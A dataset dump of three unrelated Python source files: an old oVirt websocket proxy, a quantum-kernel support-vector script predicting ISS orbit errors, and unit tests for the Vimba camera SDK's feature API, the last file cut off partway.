+{"seq_id":"86431685","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright 2013 Red Hat\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport signal\nimport gettext\nimport base64\nimport json\nimport datetime\nimport urllib\nimport Cookie\n\nimport websockify as wsproxy\nimport socket\n\nimport logging\n\n# Set up a log output file\nlog_filename=\"/log/test_log.txt\"\n\n# Set the log output format\nlog_format=' [%(asctime)s] %(message)s'\n\n# Apply the format to the log file\n#logging.basicConfig(format=log_format,datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.DEBUG,filename=log_filename,filemode='a')\n\n# CPU usage\ncpu_percent='start test....'\n#logging.debug(cpu_percent)\n\n\nclass OvirtWebSocketProxy(wsproxy.WebSocketProxy):\n    \"\"\"\n    Websocket proxy for usage with oVirt engine.\n    Leverages websocket.py by Joel Martin\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        wsproxy.WebSocketProxy.__init__(self, *args, **kwargs)\n\n    def new_client(self):\n        \"\"\"\n        Called after a new WebSocket connection has been established.\n        \"\"\"\n        self.msg('new client: ' + __name__ + \" \" + self.path)\n
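\n        # self.path carries the proxy target encoded as \"/host:port\"; drop\n        # the leading slash and split on ':' to recover host and port.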
\n        try:\n            token = self.path[1:]\n            token_arr = token.split(':')\n            host = token_arr[0]\n            port = token_arr[1]\n        except:\n            logging.debug('could not parse host:port from the request path')\n            host = None\n            port = None\n\n        self.msg(\"connecting to: %s:%s\" % (host, port))\n        tsock = self.socket(host, port, connect=True)\n\n        if self.verbose and not self.daemon:\n            print(self.traffic_legend)\n\n        # Start proxying\n        try:\n            self.do_proxy(tsock)\n        except:\n            if tsock:\n                tsock.shutdown(socket.SHUT_RDWR)\n                tsock.close()\n                self.vmsg(\"%s:%s: Target closed\" % (host, port))\n            raise\n\nif __name__ == '__main__':\n    # Create and start the NovaWebSockets proxy\n    server = OvirtWebSocketProxy(listen_host='0.0.0.0',\n                                 listen_port='6100',\n                                 source_is_ipv6=False,\n                                 verbose=True,\n                                 cert='self.pem',\n                                 key=None,\n                                 ssl_only=False,\n                                 daemon=False,\n                                 record=False,\n                                 web=False,\n                                 target_host='ignore',\n                                 target_port='ignore',\n                                 wrap_mode='exit',\n                                 wrap_cmd=None)\n    server.start_server()\n\n\n# vim: expandtab tabstop=4 shiftwidth=4\n","sub_path":"noVnc_spice/websocket-proxy_old.py","file_name":"websocket-proxy_old.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"584929021","text":"import orbit_prediction.spacetrack_etl as etl\nimport orbit_prediction.ml_model as ml\nimport orbit_prediction.build_training_data as training\n\nimport kernels.quantum as q_kernel\nimport kernels.classical as c_kernel\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom sklearn.svm import SVR\n\nSPACETRACK_USERNAME='username@email.com'\nSPACETRACK_PASSWORD='password'\n\nN_PRED_DAYS = 1\nEARTH_RAD = 6.378e6\nMEAN_ORBIT_SPEED = 7800.\nSECONDS_IN_DAY = 60.*60.*24.\n\nplt.rcParams.update({'font.size': 20})\n\ndef query_norm_X_data(n_data, X_data_raw):\n    X_data = np.zeros((n_data,13))\n    X_data[:,0] = X_data_raw['elapsed_seconds']/(N_PRED_DAYS*SECONDS_IN_DAY)\n    X_data[:,1] = X_data_raw['start_r_x']/(2.*EARTH_RAD)\n    X_data[:,2] = X_data_raw['start_r_y']/(2.*EARTH_RAD)\n    X_data[:,3] = X_data_raw['start_r_z']/(2.*EARTH_RAD)\n    X_data[:,4] = X_data_raw['start_v_x']/(MEAN_ORBIT_SPEED)\n    X_data[:,5] = X_data_raw['start_v_y']/(MEAN_ORBIT_SPEED)\n    X_data[:,6] = X_data_raw['start_v_z']/(MEAN_ORBIT_SPEED)\n    X_data[:,7] = X_data_raw['physics_pred_r_x']/(2.*EARTH_RAD)\n    X_data[:,8] = X_data_raw['physics_pred_r_y']/(2.*EARTH_RAD)\n    X_data[:,9] = X_data_raw['physics_pred_r_z']/(2.*EARTH_RAD)\n    X_data[:,10] = X_data_raw['physics_pred_v_x']/(MEAN_ORBIT_SPEED)\n    X_data[:,11] = X_data_raw['physics_pred_v_y']/(MEAN_ORBIT_SPEED)\n    X_data[:,12] = X_data_raw['physics_pred_v_z']/(MEAN_ORBIT_SPEED)\n    return X_data\n\ndef query_norm_Y_data(n_data, Y_data_raw):\n    Y_data = np.zeros((n_data,6))\n    Y_data[:,0] = Y_data_raw['physics_err_r_x']/(2.*EARTH_RAD)\n    Y_data[:,1] = Y_data_raw['physics_err_r_y']/(2.*EARTH_RAD)\n    Y_data[:,2] = Y_data_raw['physics_err_r_z']/(2.*EARTH_RAD)\n    Y_data[:,3] = Y_data_raw['physics_err_v_x']/(MEAN_ORBIT_SPEED)\n    Y_data[:,4] = Y_data_raw['physics_err_v_y']/(MEAN_ORBIT_SPEED)\n    Y_data[:,5] = Y_data_raw['physics_err_v_z']/(MEAN_ORBIT_SPEED)\n    return Y_data\n\n# Returns unit-normalised input and output data for the SVM from train_test_data\ndef get_svm_input_output(data):\n    num_train = data['X_train']['elapsed_seconds'].shape[0]\n    num_test = data['X_test']['elapsed_seconds'].shape[0]\n    X_train = query_norm_X_data(num_train, data['X_train'])\n    X_test = query_norm_X_data(num_test, data['X_test'])\n    Y_train = query_norm_Y_data(num_train, data['y_train'])\n    Y_test = query_norm_Y_data(num_test, data['y_test'])\n    return X_train, X_test, Y_train, Y_test\n
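\n# For reference (read off the builders above): each X array has 13 columns\n# (elapsed time, start position/velocity, physics-predicted position/velocity)\n# and each Y array has 6 columns (physics-model position/velocity error), all\n# scaled to roughly unit magnitude by 2*EARTH_RAD and MEAN_ORBIT_SPEED.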
\ndef main():\n    # ## Importing ISS data\n    # spacetrack_client = etl.build_space_track_client( SPACETRACK_USERNAME,\n    #                                                   SPACETRACK_PASSWORD )\n    # spacetrack_etl = etl.SpaceTrackETL(spacetrack_client)\n    # iss_orbit_data = spacetrack_etl.build_leo_df( norad_ids=['25544'],\n    #                                               last_n_days=365,\n    #                                               only_latest=None )\n    # physics_model_predicted_orbits = training.predict_orbits( iss_orbit_data,\n    #                                                           last_n_days=None,\n    #                                                           n_pred_days=N_PRED_DAYS )\n    # pickle.dump(physics_model_predicted_orbits, open(\"data/iss_data.pkl\", \"wb\"))\n    # physics_model_errors = training.calc_physics_error(physics_model_predicted_orbits)\n    # train_test_data = ml.build_train_test_sets(physics_model_errors, test_size=0.25)\n    # X_train, X_test, Y_train, Y_test = get_svm_input_output(train_test_data)\n    # pickle.dump( X_train , open( \"data/X_train.pkl\", \"wb\" ) )\n    # pickle.dump( X_test , open( \"data/X_test.pkl\", \"wb\" ) )\n    # pickle.dump( Y_train , open( \"data/Y_train.pkl\", \"wb\" ) )\n    # pickle.dump( Y_test , open( \"data/Y_test.pkl\", \"wb\" ) )\n\n    # Loading cleaned train and test data\n    X_train = pickle.load( open( \"data/X_train.pkl\", \"rb\" ) )\n    X_test = pickle.load( open( \"data/X_test.pkl\", \"rb\" ) )\n    Y_train = pickle.load( open( \"data/Y_train.pkl\", \"rb\" ) )\n    Y_test = pickle.load( open( \"data/Y_test.pkl\", \"rb\" ) )\n\n    # Calculating Gram matrix using quantum kernel\n    X_train_gram = q_kernel.calc_gram_sym(X_train)\n    np.save('./data/quantum/X_train_gram_1_rep_0_bit_scale_08.npy',X_train_gram)\n    X_test_gram = q_kernel.calc_gram(X_test,X_train)\n    np.save('./data/quantum/X_test_gram_1_rep_0_bit_scale_08.npy',X_test_gram)\n\n    # Fitting Gram matrix using support vector regression\n    X_train_gram = np.load('./data/quantum/X_train_gram_1_rep_0_bit_scale_08.npy')\n    X_test_gram = np.load('./data/quantum/X_test_gram_1_rep_0_bit_scale_08.npy' )\n    svrs = []\n    scales = []\n    gram_exp = 2.0\n    N = X_train_gram.shape[0]\n    N_a = N - 100\n    for idx in range(0,6):\n        x1 = np.power(X_train_gram[0:N_a,0:N_a],gram_exp)\n        y1 = Y_train[0:N_a,idx]\n        x2 = np.power(X_train_gram[N_a+1:N,0:N_a],gram_exp)\n        y2 = Y_train[N_a+1:N,idx]\n        svr = SVR(kernel='precomputed',C=1e-2,epsilon=1e-5)\n        svr.fit(x1,y1)\n        svrs.append(svr)\n        Y_pred = svr.predict(x2)\n        v = y2\n        w = Y_pred\n        m,b = np.polyfit(v,w,1)\n        scales.append(m)\n\n    # Plotting Final Results for X position\n    idx = 0\n    var_str = str(idx)\n    Y_pred = svrs[idx].predict(np.power(X_test_gram[:,0:N_a],gram_exp))\n    Y_pred = (1./scales[idx])*Y_pred\n    rlim = np.max(np.abs(Y_test[0:Y_test.shape[0],idx]))\n    plt.figure(figsize=(8,7))\n    plot_r = np.arange(-rlim,rlim,0.001)\n    v = Y_test[0:Y_test.shape[0],idx]\n    w = Y_pred\n    correlation_matrix = np.corrcoef(v,w)\n    print(correlation_matrix[0,1])\n    diff = w-v\n    print(np.sqrt(np.mean(w*w))*2*EARTH_RAD/1000.)\n    print(np.sqrt(np.mean(diff*diff))*2*EARTH_RAD/1000.)\n    plt.scatter(v*2*EARTH_RAD/1000.,w*2*EARTH_RAD/1000.,s=80)\n    plt.plot(plot_r*2*EARTH_RAD/1000.,plot_r*2*EARTH_RAD/1000.,'--',color='red',linewidth=3)\n    plt.title(\"X Position\")\n    plt.xlabel(\"Actual Error (km)\")\n    plt.ylabel(\"Predicted Error (km)\")\n    plt.xlim(-700,700)\n    plt.ylim(-700,700)\n    plt.tight_layout()\n    plt.show()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"124423550","text":"\"\"\"BSD 2-Clause License\n\nCopyright (c) 2019, Allied Vision Technologies GmbH\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or 
without\nmodification, are permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\n   list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\n   this list of conditions and the following disclaimer in the documentation\n   and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport unittest\nimport threading\n\nfrom vimba import *\nfrom vimba.feature import *\n\n\nclass CamBaseFeatureTest(unittest.TestCase):\n    def setUp(self):\n        self.vimba = Vimba.get_instance()\n        self.vimba._startup()\n\n        try:\n            self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to lookup Camera.') from e\n\n        try:\n            self.cam._open()\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to open Camera.') from e\n\n        try:\n            self.height = self.cam.get_feature_by_name('Height')\n\n        except VimbaCameraError:\n            self.cam._close()\n            self.vimba._shutdown()\n            self.skipTest('Required Feature \\'Height\\' not available.')\n\n    def tearDown(self):\n        self.cam._close()\n        self.vimba._shutdown()\n\n    def test_get_name(self):\n        # Expectation: Return decoded FeatureName\n        self.assertEqual(self.height.get_name(), 'Height')\n\n    def test_get_flags(self):\n        # Expectation: Return decoded FeatureFlags\n        self.assertEqual(self.height.get_flags(), (FeatureFlags.Read, FeatureFlags.Write))\n\n    def test_get_category(self):\n        # Expectation: Return decoded category\n        self.assertNotEqual(self.height.get_category(), '')\n\n    def test_get_display_name(self):\n        # Expectation: Return decoded display name\n        self.assertEqual(self.height.get_display_name(), 'Height')\n\n    def test_get_polling_time(self):\n        # Expectation: Return polling time. 
Only volatile features return\n        # anything other than zero.\n        self.assertEqual(self.height.get_polling_time(), 0)\n\n    def test_get_unit(self):\n        # Expectation: If Unit exists, return unit else return ''\n        self.assertEqual(self.height.get_unit(), '')\n\n    def test_get_representation(self):\n        # Expectation: Get numeric representation if existing else ''\n        self.assertEqual(self.height.get_representation(), '')\n\n    def test_get_visibility(self):\n        # Expectation: Get UI Visibility\n        self.assertEqual(self.height.get_visibility(), FeatureVisibility.Beginner)\n\n    def test_get_tooltip(self):\n        # Expectation: Shall not raise anything\n        self.assertNoRaise(self.height.get_tooltip)\n\n    def test_get_description(self):\n        # Expectation: Get decoded description\n        self.assertNotEqual(self.height.get_description(), '')\n\n    def test_get_sfnc_namespace(self):\n        # Expectation: Get decoded sfnc namespace\n        self.assertNotEqual(self.height.get_sfnc_namespace(), '')\n\n    def test_is_streamable(self):\n        # Expectation: Streamable features shall return True, others False\n        self.assertNoRaise(self.height.is_streamable)\n\n    def test_has_affected_features(self):\n        # Expectation: Features that affect features shall return True, others False\n        self.assertTrue(self.height.has_affected_features())\n\n    def test_has_selected_features(self):\n        # Expectation: Features that select features shall return True, others False\n        self.assertFalse(self.height.has_selected_features())\n\n    def test_get_access_mode(self):\n        # Expectation: Read/Write Features return (True, True), ReadOnly return (True, False)\n        self.assertEqual(self.height.get_access_mode(), (True, True))\n\n    def test_is_readable(self):\n        # Expectation: True if feature grants read access else False\n        self.assertTrue(self.height.is_readable())\n\n    def test_is_writeable(self):\n        # Expectation: True if feature grants write access else False\n        self.assertTrue(self.height.is_writeable())\n\n    def test_change_handler(self):\n        # Expectation: A given change handler is executed on value change.\n        # Adding the same handler multiple times shall not lead to multiple executions.\n        # The same goes for double unregister.\n\n        class Handler:\n            def __init__(self):\n                self.event = threading.Event()\n                self.call_cnt = 0\n\n            def __call__(self, feat):\n                self.call_cnt += 1\n                self.event.set()\n\n        handler = Handler()\n\n        self.height.register_change_handler(handler)\n        self.height.register_change_handler(handler)\n\n        tmp = self.height.get()\n\n        min_, _ = self.height.get_range()\n        inc = self.height.get_increment()\n\n        if min_ <= tmp - inc:\n            self.height.set(tmp - inc)\n\n        else:\n            self.height.set(tmp + inc)\n\n        handler.event.wait()\n\n        self.height.unregister_change_handler(handler)\n        self.height.unregister_change_handler(handler)\n\n        self.height.set(tmp)\n\n        self.assertEqual(handler.call_cnt, 1)\n\n    def test_stringify_features(self):\n        # Expectation: Each Feature must have a __str__ method. Depending on the Feature\n        # current Values are queried, this can fail. 
In those cases, all exceptions are\n        # fetched -> all features must be stringifiable without raising any exception\n        for feat in self.vimba.get_all_features():\n            self.assertNoRaise(str, feat)\n\n        for feat in self.cam.get_all_features():\n            self.assertNoRaise(str, feat)\n\n\nclass CamBoolFeatureTest(unittest.TestCase):\n    def setUp(self):\n        self.vimba = Vimba.get_instance()\n        self.vimba._startup()\n\n        try:\n            self.feat = self.vimba.get_feature_by_name('UsbTLIsPresent')\n\n        except VimbaFeatureError:\n            self.vimba._shutdown()\n            self.skipTest('Required Feature \\'UsbTLIsPresent\\' not available.')\n\n    def tearDown(self):\n        self.vimba._shutdown()\n\n    def test_get_type(self):\n        # Expectation: BoolFeature must return BoolFeature on get_type\n        self.assertEqual(self.feat.get_type(), BoolFeature)\n\n    def test_get(self):\n        # Expectation: returns current boolean value.\n        self.assertNoRaise(self.feat.get)\n\n    def test_set(self):\n        # Expectation: Raises invalid Access on non-writeable features.\n        self.assertRaises(VimbaFeatureError, self.feat.set, True)\n\n\nclass CamCommandFeatureTest(unittest.TestCase):\n    def setUp(self):\n        self.vimba = Vimba.get_instance()\n        self.vimba._startup()\n\n        try:\n            self.feat = self.vimba.get_feature_by_name('ActionCommand')\n\n        except VimbaFeatureError:\n            self.vimba._shutdown()\n            self.skipTest('Required Feature \\'ActionCommand\\' not available.')\n\n    def tearDown(self):\n        self.vimba._shutdown()\n\n    def test_get_type(self):\n        # Expectation: CommandFeature must return CommandFeature on get_type\n        self.assertEqual(self.feat.get_type(), CommandFeature)\n\n\nclass CamEnumFeatureTest(unittest.TestCase):\n    def setUp(self):\n        self.vimba = Vimba.get_instance()\n        self.vimba._startup()\n\n        try:\n            self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to lookup Camera.') from e\n\n        try:\n            self.cam._open()\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to open Camera.') from e\n\n        try:\n            self.feat_r = self.cam.get_feature_by_name('DeviceScanType')\n\n        except VimbaFeatureError:\n            self.cam._close()\n            self.vimba._shutdown()\n            self.skipTest('Required Feature \\'DeviceScanType\\' not available.')\n\n        try:\n            self.feat_rw = self.cam.get_feature_by_name('AcquisitionMode')\n\n        except VimbaFeatureError:\n            self.cam._close()\n            self.vimba._shutdown()\n            self.skipTest('Required Feature \\'AcquisitionMode\\' not available.')\n\n    def tearDown(self):\n        self.cam._close()\n        self.vimba._shutdown()\n\n    def test_get_type(self):\n        # Expectation: EnumFeature must return EnumFeature on get_type\n        self.assertEqual(self.feat_r.get_type(), EnumFeature)\n        self.assertEqual(self.feat_rw.get_type(), EnumFeature)\n\n    def test_entry_as_bytes(self):\n        # Expectation: Get EnumEntry as encoded byte sequence\n        expected = b'MultiFrame'\n        entry = self.feat_rw.get_entry('MultiFrame')\n\n        self.assertEqual(bytes(entry), expected)\n\n    def test_entry_as_tuple(self):\n        # Expectation: Get EnumEntry as (str, int)\n        entry = self.feat_rw.get_entry('MultiFrame')\n        self.assertEqual(entry.as_tuple(), self.feat_rw.get_entry(int(entry)).as_tuple())\n\n    def test_get_all_entries(self):\n        # Expectation: Get all possible enum entries regardless of the availability\n        expected = (self.feat_r.get_entry('Areascan'),)\n\n        for e in expected:\n            self.assertIn(e, self.feat_r.get_all_entries())\n\n        expected = (\n            self.feat_rw.get_entry('SingleFrame'),\n            self.feat_rw.get_entry('MultiFrame'),\n            
self.feat_rw.get_entry('Continuous')\n        )\n\n        for e in expected:\n            self.assertIn(e, self.feat_rw.get_all_entries())\n\n    def test_get_avail_entries(self):\n        # Expectation: All returned enum entries must be available\n        for e in self.feat_r.get_available_entries():\n            self.assertTrue(e.is_available())\n\n        for e in self.feat_rw.get_available_entries():\n            self.assertTrue(e.is_available())\n\n    def test_get_entry_int(self):\n        # Expectation: Lookup a given entry by using an int as key.\n        # Invalid keys must raise VimbaFeatureError.\n\n        expected = self.feat_r.get_all_entries()[0]\n        self.assertEqual(self.feat_r.get_entry(int(expected)), expected)\n\n        expected = self.feat_rw.get_all_entries()[1]\n        self.assertEqual(self.feat_rw.get_entry(int(expected)), expected)\n\n        self.assertRaises(VimbaFeatureError, self.feat_r.get_entry, -1)\n        self.assertRaises(VimbaFeatureError, self.feat_rw.get_entry, -1)\n\n    def test_get_entry_str(self):\n        # Expectation: Lookup a given entry by using a str as key.\n        # Invalid keys must raise VimbaFeatureError.\n\n        expected = self.feat_r.get_all_entries()[0]\n        self.assertEqual(self.feat_r.get_entry(str(expected)), expected)\n\n        expected = self.feat_rw.get_all_entries()[1]\n        self.assertEqual(self.feat_rw.get_entry(str(expected)), expected)\n\n        self.assertRaises(VimbaFeatureError, self.feat_r.get_entry, 'Should be invalid')\n        self.assertRaises(VimbaFeatureError, self.feat_rw.get_entry, 'Should be invalid')\n\n    def test_get(self):\n        # Expectation: Get must return the current value.\n        self.assertNoRaise(self.feat_r.get)\n        self.assertNoRaise(self.feat_rw.get)\n\n    def test_set_entry(self):\n        # Expectation: Set given enum entry if feature is writable.\n        # Raises:\n        # - VimbaFeatureError if enum entry is from other enum feature.\n        # - VimbaFeatureError if feature is read only\n\n        # Read Only Feature\n        entry = self.feat_r.get_all_entries()[0]\n        self.assertRaises(VimbaFeatureError, self.feat_r.set, entry)\n\n        # Read/Write Feature\n        old_entry = self.feat_rw.get()\n\n        try:\n            # Normal operation\n            
self.assertNoRaise(self.feat_rw.set, int(self.feat_rw.get_entry(2)))\n self.assertEqual(self.feat_rw.get(), self.feat_rw.get_entry(2))\n\n # Provoke FeatureError by an invalid enum value\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, -23)\n\n finally:\n self.feat_rw.set(old_entry)\n\n def test_set_in_callback(self):\n # Expected behavior: A set operation within a change handler must\n # Raise a VimbaFeatureError to prevent an endless handler execution.\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n old_entry = self.feat_rw.get()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n # Trigger change handler and wait for callback execution.\n self.feat_rw.set(self.feat_rw.get())\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n self.feat_rw.set(old_entry)\n\n\nclass CamFloatFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.feat_r = self.vimba.get_feature_by_name('Elapsed')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'Elapsed\\' not available.')\n\n try:\n self.feat_rw = self.cam.get_feature_by_name('ExposureTime')\n\n except VimbaFeatureError:\n # Some Cameras name ExposureTime as ExposureTimeAbs\n try:\n self.feat_rw = self.cam.get_feature_by_name('ExposureTimeAbs')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'ExposureTime\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: FloatFeature returns FloatFeature on get_type.\n self.assertEqual(self.feat_r.get_type(), FloatFeature)\n self.assertEqual(self.feat_rw.get_type(), FloatFeature)\n\n def test_get(self):\n # Expectation: Get current value.\n\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_get_range(self):\n # Expectation: Get value range. Raise VimbaFeatureError on non-read access.\n self.assertNoRaise(self.feat_r.get_range)\n self.assertNoRaise(self.feat_rw.get_range)\n\n def test_get_increment(self):\n # Expectation: Get value increment if existing. If this Feature has no\n # increment, None is returned.\n\n self.assertNoRaise(self.feat_r.get_increment)\n self.assertNoRaise(self.feat_rw.get_increment)\n\n def test_set(self):\n # Expectation: Set value. 
Errors:\n # VimbaFeatureError if access right are not writable\n # VimbaFeatureError if value is out of bounds\n\n # Read only feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, 0.0)\n\n # Read/Write Feature\n old_value = self.feat_rw.get()\n\n try:\n delta = 0.1\n\n # Range test\n min_, max_ = self.feat_rw.get_range()\n\n # Within bounds (no error)\n self.assertNoRaise(self.feat_rw.set, min_)\n self.assertAlmostEqual(self.feat_rw.get(), min_)\n self.assertNoRaise(self.feat_rw.set, max_)\n self.assertAlmostEqual(self.feat_rw.get(), max_)\n\n # Out of bounds (must raise)\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, min_ - delta)\n self.assertRaises(VimbaFeatureError, self.feat_rw.set, max_ + delta)\n\n finally:\n self.feat_rw.set(old_value)\n\n def test_set_in_callback(self):\n # Expectation: Calling set within change_handler must raise an VimbaFeatureError\n\n class Handler:\n def __init__(self):\n self.raised = False\n self.event = threading.Event()\n\n def __call__(self, feat):\n try:\n feat.set(feat.get())\n\n except VimbaFeatureError:\n self.raised = True\n\n self.event.set()\n\n old_entry = self.feat_rw.get()\n\n try:\n handler = Handler()\n self.feat_rw.register_change_handler(handler)\n\n # Trigger change handler and wait for callback execution.\n self.feat_rw.set(self.feat_rw.get())\n handler.event.wait()\n\n self.assertTrue(handler.raised)\n\n finally:\n self.feat_rw.unregister_change_handler(handler)\n self.feat_rw.set(old_entry)\n\n\nclass CamIntFeatureTest(unittest.TestCase):\n def setUp(self):\n self.vimba = Vimba.get_instance()\n self.vimba._startup()\n\n try:\n self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to lookup Camera.') from e\n\n try:\n self.cam._open()\n\n except VimbaCameraError as e:\n self.vimba._shutdown()\n raise Exception('Failed to open Camera.') from e\n\n try:\n self.feat_r = self.cam.get_feature_by_name('HeightMax')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'HeightMax\\' not available.')\n\n try:\n self.feat_rw = self.cam.get_feature_by_name('Height')\n\n except VimbaFeatureError:\n self.cam._close()\n self.vimba._shutdown()\n self.skipTest('Required Feature \\'Height\\' not available.')\n\n def tearDown(self):\n self.cam._close()\n self.vimba._shutdown()\n\n def test_get_type(self):\n # Expectation: IntFeature must return IntFeature on get_type\n self.assertEqual(self.feat_r.get_type(), IntFeature)\n self.assertEqual(self.feat_rw.get_type(), IntFeature)\n\n def test_get(self):\n # Expectation: Get current value\n\n self.assertNoRaise(self.feat_r.get)\n self.assertNoRaise(self.feat_rw.get)\n\n def test_get_range(self):\n # Expectation: Get range of accepted values\n self.assertNoRaise(self.feat_r.get_range)\n self.assertNoRaise(self.feat_rw.get_range)\n\n def test_get_increment(self):\n # Expectation: Get step between valid values\n self.assertNoRaise(self.feat_r.get_increment)\n self.assertNoRaise(self.feat_rw.get_increment)\n\n def test_set(self):\n # Expectation: Set value or raise VimbaFeatureError under the following conditions.\n # 1) Invalid Access Rights\n # 2) Misaligned value.\n # 3) Out-of-bounds Access\n\n # Read only feature\n self.assertRaises(VimbaFeatureError, self.feat_r.set, 0)\n\n # Writable feature\n old_value = self.feat_rw.get()\n\n try:\n inc = self.feat_rw.get_increment()\n min_, max_ = self.feat_rw.get_range()\n\n # Normal usage\n 
self.assertNoRaise(self.feat_rw.set, min_)\n            self.assertEqual(self.feat_rw.get(), min_)\n            self.assertNoRaise(self.feat_rw.set, max_)\n            self.assertEqual(self.feat_rw.get(), max_)\n\n            # Out of bounds access.\n            self.assertRaises(VimbaFeatureError, self.feat_rw.set, min_ - inc)\n            self.assertRaises(VimbaFeatureError, self.feat_rw.set, max_ + inc)\n\n        finally:\n            self.feat_rw.set(old_value)\n\n    def test_set_in_callback(self):\n        # Expectation: Setting a value within a Callback must raise a VimbaFeatureError\n\n        class Handler:\n            def __init__(self):\n                self.raised = False\n                self.event = threading.Event()\n\n            def __call__(self, feat):\n                try:\n                    feat.set(feat.get())\n\n                except VimbaFeatureError:\n                    self.raised = True\n\n                self.event.set()\n\n        old_entry = self.feat_rw.get()\n\n        try:\n            handler = Handler()\n            self.feat_rw.register_change_handler(handler)\n\n            # Trigger change handler and wait for callback execution.\n            min_, _ = self.feat_rw.get_range()\n            inc = self.feat_rw.get_increment()\n\n            if min_ <= (old_entry - inc):\n                self.feat_rw.set(old_entry - inc)\n\n            else:\n                self.feat_rw.set(old_entry + inc)\n\n            handler.event.wait()\n\n            self.assertTrue(handler.raised)\n\n        finally:\n            self.feat_rw.unregister_change_handler(handler)\n            self.feat_rw.set(old_entry)\n\n\nclass CamStringFeatureTest(unittest.TestCase):\n    def setUp(self):\n        self.vimba = Vimba.get_instance()\n        self.vimba._startup()\n\n        try:\n            self.cam = self.vimba.get_camera_by_id(self.get_test_camera_id())\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to lookup Camera.') from e\n\n        try:\n            self.cam._open()\n\n        except VimbaCameraError as e:\n            self.vimba._shutdown()\n            raise Exception('Failed to open Camera.') from e\n\n        self.feat_r = None\n        feats = self.cam.get_features_by_type(StringFeature)\n\n        for feat in feats:\n            if feat.get_access_mode() == (True, False):\n                self.feat_r = feat\n\n        if self.feat_r is None:\n            self.cam._close()\n            self.vimba._shutdown()\n            self.skipTest('Test requires read only StringFeature.')\n\n        self.feat_rw = None\n        feats = self.cam.get_features_by_type(StringFeature)\n\n        for feat in feats:\n            if feat.get_access_mode() == (True, True):\n                self.feat_rw = feat\n\n        if self.feat_rw is None:\n            self.cam._close()\n            self.vimba._shutdown()\n            self.skipTest('Test requires read/write StringFeature.')\n\n    def tearDown(self):\n        self.cam._close()\n        self.vimba._shutdown()\n\n    def test_get_type(self):\n        # Expectation: StringFeature must return StringFeature on get_type\n        